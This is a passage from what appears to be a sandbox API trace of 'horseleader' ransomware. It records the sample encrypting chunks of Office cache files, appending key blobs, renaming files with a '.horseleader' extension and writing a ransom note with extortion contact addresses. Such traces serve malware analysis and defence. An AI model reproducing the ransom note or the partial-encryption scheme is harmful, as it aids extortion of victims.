pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0205.456] StrStrIW (lpFirst="ProjLR.cab", lpSrch=".horseleader") returned 0x0 [0205.456] lstrcmpW (lpString1="ProjLR.cab", lpString2="#Decrypt#.txt") returned 1 [0205.463] lstrcmpW (lpString1="ProjLR.cab", lpString2="_uninstalling_.png") returned 1 [0205.471] lstrlenW (lpString=".testttjffg") returned 11 [0205.471] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab", lpSrch=".testttjffg") returned 0x0 [0205.471] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0205.471] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0205.471] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0205.484] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 77 [0205.484] StrStrW (lpFirst="ProjLR.cab", lpSrch=".txt") returned 0x0 [0205.484] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=8265165) returned 1 [0205.484] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.484] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0205.528] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0205.528] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0205.528] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3ee6e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.528] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0206.257] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0206.257] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0206.257] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7dcdcd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0206.257] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.726] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.727] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.727] 
SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.727] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0208.727] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0208.727] CloseHandle (hObject=0x21c) returned 1 [0208.728] GetProcessHeap () returned 0x780000 [0208.728] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0208.728] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.horseleader") returned 89 [0208.728] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projlr.cab.horseleader")) returned 1 [0208.729] GetProcessHeap () returned 0x780000 [0208.729] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0208.730] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, 
nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0208.730] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0208.730] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0208.730] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0208.730] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0208.730] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0208.730] lstrlenW (lpString=".testttjffg") returned 11 [0208.730] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0208.730] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.730] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0208.731] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0208.731] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0208.731] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1872) returned 1 [0208.731] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, 
lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x750, lpOverlapped=0x0) returned 1 [0208.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff8b0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.763] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x750, lpOverlapped=0x0) returned 1 [0208.763] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.764] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0208.764] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0208.764] CloseHandle (hObject=0x21c) returned 1 [0208.764] GetProcessHeap () returned 0x780000 [0208.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0208.764] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0208.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0208.765] GetProcessHeap () 
returned 0x780000 [0208.765] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0208.765] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0208.765] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0208.765] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0208.765] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0208.766] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0208.766] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0208.768] lstrlenA (lpString="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") returned 1368 [0208.768] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0208.768] CloseHandle (hObject=0x1cc) returned 1 [0208.768] GetProcessHeap () returned 0x780000 [0208.768] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0208.768] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0208.768] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0208.768] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 66 [0208.769] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0208.769] lstrcmpW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0208.769] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0208.769] GetProcessHeap () returned 0x780000 [0208.769] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0208.769] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*") returned 68 [0208.769] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0208.820] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0208.820] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.") returned 68 [0208.820] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0208.820] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0208.820] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0208.820] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0208.820] lstrlenW (lpString=".testttjffg") returned 11 [0208.820] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0208.820] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.820] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0208.820] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.820] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0208.821] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0208.821] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..") returned 69 [0208.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0208.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0208.821] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0208.821] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0208.821] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0208.821] lstrlenW (lpString=".testttjffg") returned 11 [0208.821] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0208.821] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.821] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.821] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0208.821] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0208.821] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="Windows") returned -1 [0208.821] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0208.821] StrStrIW (lpFirst="GrooveLR.cab", lpSrch=".horseleader") returned 0x0 [0208.821] lstrcmpW (lpString1="GrooveLR.cab", lpString2="#Decrypt#.txt") returned 1 [0208.821] lstrcmpW (lpString1="GrooveLR.cab", lpString2="_uninstalling_.png") returned 1 [0208.822] lstrlenW (lpString=".testttjffg") returned 11 [0208.822] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab", lpSrch=".testttjffg") returned 0x0 [0208.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.822] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0208.823] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned 79 [0208.823] StrStrW (lpFirst="GrooveLR.cab", lpSrch=".txt") returned 0x0 [0208.823] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4095519) returned 1 [0208.823] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.823] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.827] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.827] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.827] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x1f170f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.827] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.903] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) 
returned 1 [0208.904] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.904] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x3e2e1f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.904] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.958] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0208.958] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0208.959] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.959] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0208.959] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0208.959] CloseHandle (hObject=0x21c) returned 1 [0208.959] GetProcessHeap () returned 0x780000 [0208.959] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0208.959] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All 
